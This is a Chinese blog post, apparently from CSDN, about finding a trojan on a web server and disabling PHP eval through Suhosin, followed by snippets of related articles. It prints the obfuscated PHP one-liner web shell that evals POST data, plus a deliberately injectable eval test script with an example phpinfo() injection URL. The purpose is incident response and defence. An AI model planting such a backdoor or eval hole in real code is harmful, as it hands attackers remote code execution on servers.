中木马了

原创 2015年11月20日 12:20:12

服务器中了木马,代码如下:

($b4dboy = $_POST['aaa']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

原理:

这段代码将post进来的数据直接调用eval执行。来个更简单的,保存为test.php:

<?php
// filename: test.php
$var = "var";

if (isset($_GET["arg"]))

{

  $arg = $_GET["arg"];

  eval("\$var = $arg;"); // 这一句容易写错,导致验证效果不对

  echo $var;

}
?>

然后访问服务器:http://www.xxx.com/test.php?arg=phpinfo(),看看白花花的系统配置输出,就能体会到危险性了。



解决方案:

看来得把eval禁用掉了。用SUHOSIN。详见下面的评论。



如何测试是否禁用成功,增加程序test.php:

<?php
//  例子来源:http://www.php.net/manual/zh/function.eval.php
$string = 'cup';
$name = 'coffee';
$str = 'This is a $string with my $name in it.';
eval("\$str = \"$str\";");
echo $str. "\n";
?>

如果能打印出This is a cup with my coffee in it. 说明没有禁用成功。如果返回500错误,说明禁用成功。



方法二:通过命令行运行test.php,会输出下面的错误,表示禁用成功了:

[root@AY]# php test.php
PHP Fatal error:  SUHOSIN - Use of eval is forbidden by configuration in /home/domain/test.php(6) : eval()'d code on line 1


版权声明:本文为博主原创文章,未经博主允许不得转载。微信hustos联系博主。

Linux服务器中木马(肉鸡)手工清除方法(转载)

由于自己也碰到过这种情况,刚好看到这篇文章,先转载过来。的确蛮有用的哦。 首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称...
  • w2909526
  • w2909526
  • 2017年04月20日 17:09
  • 641

exe打开方式被木马或病毒修改,无法打开任何可执行文件的解决办法

对于exe打开方式被木马或病毒修改,无法打开任何可执行文件的解决办法。 方案一:     先将regedit.exe改名为regedit.com或regedit.scr。 运行regedit.c...
  • qq_22642239
  • qq_22642239
  • 2018年01月22日 11:27
  • 57

网站被挂木马病毒了,怎么办?

A。为什么好好的网站会有木马?一般木马是来自ASP SHELL和PHP SHELL的程序段控制不严,程序上有上传功能,没有进行文件目录和文件后缀等的判断,一般这类的目录,以“海阳顶端网ASP木马”较为...
  • jinzhai
  • jinzhai
  • 2007年11月07日 09:29
  • 1317

今天我的阿里云服务器中招了

接到电话说阿里云上的服务无法访问,让我去处理下。最近这个阿里云服务器老是不稳定,动不动就无法访问,正好今天有时间,打算彻底检查下。一检查,发现问题果然很严重,简单说,就是被人种了木马,而且还不止一个,...
  • zhylg2001
  • zhylg2001
  • 2016年12月15日 09:33
  • 2859

一个Jsp写的木马文件

  • bfboys
  • bfboys
  • 2016年09月10日 17:17
  • 685

传说中的JSP木马!JSP资源管理器.

 其实这不能算是木马了.不过如果能上传到某个垃圾服务器上倒是可以做很多事.呵呵.下面是程序原代码:  文件名 adminIndex.jsp注意:这里用到了一个包. org.apache.commons...
  • laobu
  • laobu
  • 2006年09月20日 10:25
  • 1898

一句话木马的使用

asp一句话木马:        Description: 类型不匹配: 'execute'      这个如何解决呢?     想出了一个好办法,只要用"eval"替换掉"e...
  • wljlwyq
  • wljlwyq
  • 2014年10月06日 18:24
  • 1778

Ubuntu "肉鸡" 记

今天来和伙伴说说我这两天,亲历的一次网络安全问题。我之前对基础网络方面的知识确实没多少了解,并且正好在假期没什么事情,于是想着借着这次机会好好玩把。虽然已经抓到了木马程序,但是还没理解黑客是怎么黑进来...
  • yangkuanqaz85988
  • yangkuanqaz85988
  • 2015年10月05日 00:57
  • 1630

如何有效防止DEDE织梦系统被挂木马安全设置(仅供参考)

尊敬的客户,您好!     感谢广大客户对我司工作的信任和支持!      我司在最近的一个多月内陆续发现多起因 DedeCMS 安全漏洞造成网站被上传恶意脚本的事件,入侵者可利用恶意脚本对外...
  • moqiang02
  • moqiang02
  • 2013年09月25日 13:45
  • 1864

一个驱动木马的分析

【文章标题】: 一个驱动木马的分析【文章作者】: prince【作者邮箱】: cracker_prince@163.com【作者QQ号】: 812937【软件名称】: Trojan program T...
  • iiprogram
  • iiprogram
  • 2007年01月25日 20:21
  • 1277
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:中木马了
举报原因:
原因补充:

(最多只允许输入30个字)